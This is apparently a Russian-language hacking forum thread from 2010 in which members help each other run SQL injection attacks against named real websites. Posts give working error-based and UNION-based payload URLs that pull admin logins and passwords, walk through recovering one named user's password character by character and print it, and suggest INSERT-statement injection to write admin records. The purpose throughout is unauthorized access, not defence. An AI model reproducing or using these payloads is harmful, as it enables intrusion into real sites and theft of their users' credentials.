Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Axel_Ustus

    Axel_Ustus New Member

    Joined:
    4 Jun 2010
    Messages:
    17
    Likes Received:
    4
    Reputations:
    1
    спасибо kamaz)
    мне была интересна именно причина
     
  2. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    1

    Code:
    http://www.xvideo.ru/catalog.php?group=7+/*!oR+1+gRoUp+bY+cOnCat%28%28SeLEcT+concat_ws%280x3a,id,password,login%29%20from%20a_admins%20limit%200,1%29,rAnD%280%29|0%29+hAvInG+miN%280%29%20*/
    http://www.xvideo.ru/admin/login.php?action=send

    там такое:
    если подмутить типо такого в логин, то должно пустить поидеи:
    зы итак крутить через ошибку можно :)
     
    #14782 Strilo4ka, 9 Sep 2010
    Last edited: 9 Sep 2010
    3 people like this.
  3. gabarea

    gabarea New Member

    Joined:
    30 Mar 2010
    Messages:
    30
    Likes Received:
    2
    Reputations:
    1
    может кто-нибудь помочь мне с этим?
    http://www.menupix.com/hoboken/restaurants.php?id=305209
    Я не могу извлечь базу данных
     
  4. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    Code:
    http://www.menupix.com/hoboken/restaurants.php?id=305209%20and%20%20%28/**/select%20count%28*%29%20from%20%28/**/select%201%20union%20/**/select%202/**/union/**/select%203%29x%20group%20by%20concat%28database%28%29,floor%28rand%280%29*2%29%29%29
     
    #14784 Strilo4ka, 9 Sep 2010
    Last edited: 9 Sep 2010
    1 person likes this.
  5. gabarea

    gabarea New Member

    Joined:
    30 Mar 2010
    Messages:
    30
    Likes Received:
    2
    Reputations:
    1
    что это значит? Я не могу извлечь данные?
     
  6. brutos

    brutos Member

    Joined:
    25 Nov 2009
    Messages:
    123
    Likes Received:
    27
    Reputations:
    8
    gabarea:
    information_schema.tables фильтруется, поэтому делаем так:
    "Duplicate entry '6471' for key 1" - 647 колонок. Далее прогоняй вот так:
    меняя "limit+0,1" - "limit+647,1". Так сможешь вывести все имена колонок и таблиц, в которых они находятся.
    Дальше, надеюсь, сам разберешься.
     
    1 person likes this.
  7. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    кстати, сегодня пытаюсь зайти туда и .. ВУАЛЯ ! сайт лежит. (или ведется тех.работы)
    и каким то чудом информация доступна о софте:
    в служебном инфе есть линк на __http://drupal.org/node/258
    отсюда можно делать вывод, что это Drupal движек.. хотя я думал самописный.

    а внизу мелким штифтом:
    The mysql error was: Too many connections.
    а тут и тип БД.
    P.S. DDoS или что.. ?

    теперь все это дело надо как небудь совместить..
    если там mod_rewrite, то смогу что то ковырять в БД ? или это бесполезно?
     
    #14787 B1t.exe, 11 Sep 2010
    Last edited by a moderator: 2 Mar 2011
  8. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Если тебе известен двиг, скачай исходники и посмотри структуру запросов.
     
    #14788 h00lyshit!, 11 Sep 2010
    Last edited: 2 Mar 2011
  9. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    ну это логично и я понимаю насчет уязвимостей, но там насчет запросов SQL получиться, если ничего не отображаеться на адресном сторке?
    mod_rewrite
     
  10. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    такая проблема:

    http://www.soulmades.com/index.php?method=pubchatform&roomid=1%20union%20select%201,id,password,4,5%20from%20soul_souluser%20where+id=1101181/*

    вывод идет сюда:

    Code:
    <b>Private chat between <a href='index.php?ap=[B]1101181[/B]' target='_blank'>[B]lily_michelle[/B]</a> and <a href='index.php?ap=[B]539818[/B]' target='_blank'></a></b><br>
    
    1101181 - id
    lily_michelle - name
    539818 - password

    вывод возможен только числовых значений
    непонятки с паролем, то ли он выводится неполным, то ли еще что-то. давайте вместе помозгуем.
     
  11. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,length(password),4,5 from soul_souluser where+id=1101181/*
    =>
    длина пароля 16

    http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,mid(password,1,6),4,5 from soul_souluser where+id=1101181/*
    =>
    первые 6 символов '539818'


    http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,ascii(mid(password,7,1)),4,5 from soul_souluser where+id=1101181/*
    =>
    ascii код 7-го символа 99 => 'c'

    дальше можно самостоятельно ;)

    ... добалено позже ...

    не, решил дальше поизвращаться :)

    http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,-(-ascii(mid(password,8,1))-100*ascii(mid(password,9,1))-100*100*ascii(mid(password,10,1))),4,5 from soul_souluser where+id=1101181/*
    =>
    ascii коды 10,9,8 символа = 544955 => '716'

    http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,mid(password,8),4,5 from soul_souluser where+id=1101181/*
    =>
    8-13 символы = '716512'

    http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,-(-ascii(mid(password,14,1))-1000*ascii(mid(password,15,1))-1000*1000*ascii(mid(password,16,1))),4,5 from soul_souluser where+id=1101181/*
    =>
    ascii коды 16,15,14 символа = 57049102 => 'f19'

    password = '539818c716512f19'

    проверяем
    http://www.soulmades.com/index.php?method=pubchatform&roomid=1 union select 1,id,if(password='539818c716512f19',1,8),4,5 from soul_souluser where+id=1101181/*
    =>
    1, т.е. пароль верный :)


    кста, вариант с if(password=0x35333938313863373136353132663139,1,8) почему-то не прокатил. кто знает почему такое может быть ?
     
    #14791 DrakonHaSh, 12 Sep 2010
    Last edited: 12 Sep 2010
    3 people like this.
  12. rooopster

    rooopster New Member

    Joined:
    29 Aug 2010
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    Привет, подскажите, пожалуйста, чем побыстрее через инъекцию сдампить базу в 18к записей?
     
  13. hacker-nubik

    hacker-nubik New Member

    Joined:
    20 Apr 2010
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    http://forum.xakepok.net/showthread.php?t=7222
     
  14. asia555

    asia555 New Member

    Joined:
    25 Aug 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Существует такой запрос
    INSERT table_names SET val1=firstname, val2=lastname
    Значение val2 могу привести к любому виду.
    Задача - добавить запись в table_admin или сделать вывод из table_users.
    Возможно ли как-нибудь выкрутиться?

    *сделать insert into outfile - не могу, нет прав
    **обнаружить select, который бы принимал val2 пока не удалось
    Сорри, если это боян. Буду признателен за любую помощь.
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    я совсем не понял что надо делать, но если ты это хочечь то.. :rolleyes:

    INSERT INTO table_users (val1, val2) values ('blabla','blabla');

    выборка

    вывод - Select val1,val2 from table_users limit 1;

    а INSERT INTO outfile в первые слышу :D
     
    _________________________
  16. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Тоже не совсем понял, что тебе нужно, но вывод,если я правильно понимаю, можно сделать так:
    В поле lastname пишем запрос вида
    Code:
    ',firstname=(select {Что_угодно} from table_users limit 1),lastname='pipiska
    Если есть инъекция, то после выполнения запроса вместо имени будет выведено то, что было запрошено)
     
    2 people like this.
  17. asia555

    asia555 New Member

    Joined:
    25 Aug 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Сорри, что криво объяснил.
    OC - *nix, БД - MySQL. В БД три таблицы table_admin, table_users, table_names. В таблице table_names три поля - user_id, val1, val2.
    user_id - это primary key, автоинкримент.
    Я обращаюсь к скрипту, в котором есть такой запрос:
    INSERT table_names SET user_id=1 val1=firstname, val2=lastname
    с val2 я могу делать все что угодно.
    Я хочу либо слить таблицу table_users либо добавить запись в table_admin.

    Случай 1. Я могу привести запрос к виду:
    INSERT table_names SET user_id=1, val1=firstname, val2=(select {Что_угодно} from table_users limit 1)
    После чего весь нужный мне вывод попадает в val2 , но я его не вижу. Т.к. SELECT val2 у меня нигде не встречается.
    Здесь я конечно ерунду написал.
    Я имел ввиду, что если бы у меня были права на запись в какой-нибудь файл, то я мог бы попробовать сделать
    INSERT table_names SET val1=firstname, val2=(select * from table_users into outfile 'file.txt'). Но так писать в файл я по-видимому не могу =(
    Сегодня попробовал на локалхосте:
    SELECT username from table_users where user_id=1 INTO outfile 'file.txt' - так работает, файл создается
    INSERT table_names SET val1=firstname, val2=(SELECT username FROM table_users WHERE user_id=1 INTO outfile 'file.txt') - так не работает =(

    Случай 2. Оставив попытки вывести select * from table_users, я хотел добавить запись в table_admin. Пробовал так:
    INSERT table_names SET user_id=1 val1=firstname, val2=(lastname on duplicate key update table_admin SET <тут все что я хотел записать в table_admin>)
    user_id передаю заведомо дублирующийся.
    Но насколько я понял, таким запросом с таблицей table_admin ничего не поделаешь. А точнее так - таким запросом не возможно воздействовать ни на какую таблицу кроме table_names. Так ли это?

    Что еще можно попробовать сделать в первом и втором случае?
     
    #14797 asia555, 13 Sep 2010
    Last edited: 14 Sep 2010
  18. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    Помогите раскрутить ету скулю.
    Code:
    http://polvent.com/index.php?action=catalog&brand=-2+UnIon+selECt+1,2,3,4,5,version(),7,8,9,10,11,12,13+from+admin--+
    Знаю, что таблица админ. Но к information_schema.tables доступа нет. Или что там такое? Помогите пожалуйста..
     
  19. brutos

    brutos Member

    Joined:
    25 Nov 2009
    Messages:
    123
    Likes Received:
    27
    Reputations:
    8
    moodoone, вот такого плана инъекция:
    Дальше сам знаешь.
     
    1 person likes this.
  20. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    Спасибо! А где можна почитать про такого вида инъекции?
     
Loading...
Thread Status:
Not open for further replies.